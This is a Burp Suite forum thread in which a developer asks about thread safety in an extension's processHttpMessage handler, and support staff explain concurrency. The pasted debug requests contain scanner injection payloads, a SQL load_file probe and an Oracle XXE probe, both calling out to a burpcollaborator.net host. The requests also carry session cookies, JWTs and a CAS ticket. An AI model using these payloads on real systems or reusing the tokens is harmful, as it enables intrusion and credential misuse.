Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Is processHttpMessage thread safe?

bit4woo | Last updated: Mar 27, 2019 12:42PM UTC

Hi Team, I have create a extension that to auto edit MessageInfo with registerHttpListener (using processHttpMessage method.) in processHttpMessage method . I call another class which created by myself, it's responsible for receiving a messageinfo and parse to get header\body\....; but when I run my extension in burp. I found it also get different messageinfo(the hashcode of object shows they are different.) I have also tries to use "synchronized" ,but not works. could you please help me ,thanks . the source code: https://github.com/bit4woo/knife/blob/master/src/burp/MessageEditor.java some output when debug: Host: eos-tdos-int.sit.xxxxxxxxxx.com Content-Length: 0 Origin: http://eos-tdos.sit.xxxxxxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 DNT: 1 Accept: */* Referer: http://eos-tdos.sit.xxxxxxxxxx.com/module/index.html Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7 Cookie: kj_s_id=Y2E0NDEyNAMTAuMTE4Ljc0LjY5MTU1MzY0ODkyNjQzNgNzIyZmQ1; kj_login_time=1553648926; kj_autologin=1; kj_area_id=103; kj_area_name=8%E6%A5%BC; kj_area_uid=262586; kj_cart_ids0=; JSESSIONID=y9df3mz3ouh3qn9sn3vre8j; _TOKEN_KEY_=eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiI4NDM3MTAiLCJleHAiOjE1NTM2ODE5MjZ9.6AVw9srskOBWmvJotdDrk3hqWf9gw5JYvXUkoQpe0WI Connection: close //////////////////////////////// POST /dictionary/queryPageHelper HTTP/1.1 Host: eos-tdos-int.sit.xxxxxxxxxx.com Content-Length: 70 Origin: http://eos-tdos.sit.xxxxxxxxxx.com SfopenReferer: http://eos-tdos.sit.xxxxxxxxxx.com/module/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Content-Type: application/json;charset=UTF-8 Accept: application/json, text/plain, */* lang: zh-CN DNT: 1 Referer: http://eos-tdos.sit.xxxxxxxxxx.com/module/index.html Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7 Cookie: kj_s_id=Y2E0NDEyNAMTAuMTE4Ljc0LjY5MTU1MzY0ODkyNjQzNgNzIyZmQ1; kj_login_time=1553648926; kj_autologin=1; kj_area_id=103; kj_area_name=8%E6%A5%BC; kj_area_uid=262586; kj_cart_ids0='%2b(select%20load_file('%5c%5c%5c%5c0lm6gsdaj9pq7rw9xivvr2c0frlnmbde17o3cs.burpcollaborator.net%5c%5cfmo'))%2b'; JSESSIONID=yrglq9lcb91188bxbf690ce6; _TOKEN_KEY_=eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIxNjYwNDYiLCJleHAiOjE1NTM2ODI1NzZ9.rozdG97r3HO_osovJG_vAhRRJ63ZW4_cnDgnDa8-ZKU; SfopenReferer=; selCty=0; Hm_lvt_32464c62d48217432782c817b1ae58ce=1547721485; CASTGC=TGT-65879-qcyVZDwFIQ4m7q701SiOmxGesVSccWVZIbHepP1MYQa2FMcMFd-M9h5m1-casnode1; SERVERID=web1 Connection: close {"pkeyPath":"","dicKey":"","dicName":"","currentPage":1,"pageSize":20} first: bodyOffset 1256 requestLength 1236 hashcode 873431550 second: bodyOffset 1236 requestLength 1236 hashcode 1001170758 POST /dictionary/queryEntityListById?pkeyPath=BaseSetting.RoleTypes HTTP/1.1 Host: eos-tdos-int.sit.xxxxxxxxxx.com Content-Length: 0 Origin: http://eos-tdos.sit.xxxxxxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % ljncz SYSTEM "http://ssoynkk2q1wiej314a2nyujsmjsfu3yrtej28.burpcollab'||'orator.net/">%ljncz;]>'),'/l') from dual)||' DNT: 1 Accept: */* Referer: http://eos-tdos.sit.xxxxxxxxxx.com/module/index.html Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7 Cookie: kj_s_id=Y2E0NDEyNAMTAuMTE4Ljc0LjY5MTU1MzY0ODkyNjQzNgNzIyZmQ1; kj_login_time=1553648926; kj_autologin=1; kj_area_id=103; kj_area_name=8%E6%A5%BC; kj_area_uid=262586; kj_cart_ids0=; JSESSIONID=yrglq9lcb91188bxbf690ce6; _TOKEN_KEY_=eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIxNjYwNDYiLCJleHAiOjE1NTM2ODI1NzZ9.rozdG97r3HO_osovJG_vAhRRJ63ZW4_cnDgnDa8-ZKU; SfopenReferer=; selCty=0; Hm_lvt_32464c62d48217432782c817b1ae58ce=1547721485; CASTGC=TGT-65879-qcyVZDwFIQ4m7q701SiOmxGesVSccWVZIbHepP1MYQa2FMcMFd-M9h5m1-casnode1; SERVERID=web1 Connection: close ////////////////////////////////

PortSwigger Agent | Last updated: Mar 27, 2019 02:26PM UTC

processHttpMessage can be called multiple times simultaneously. So your code does need to be thread safe. Nothing else should modify messageInfo while your extension is running. The hash code is changing because you are changing the messageInfo contents. You can use System.identityHashCode to confirm that you're pointing to the same object.

Burp User | Last updated: Mar 28, 2019 04:39AM UTC

I need Scanner and My extension running at same time. want to change all traffic of burp. is that possible ? Thanks again. Paul

PortSwigger Agent | Last updated: Mar 28, 2019 10:16AM UTC

Ok, I don't exactly understand what you mean but yes, you can change all Burp's outgoing traffic using IHttpListener.

Burp User | Last updated: Mar 31, 2019 02:14PM UTC

Hi Paul, my extension update cookie for all traffic automatically. scanner change the message, my extension also change it. I have tested with System.identityHashCode() method. when on scanner thread running,every thing works fine. but when multiple Scanner running, error will found . processHttpMessage() method will get different messageinfo Object.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.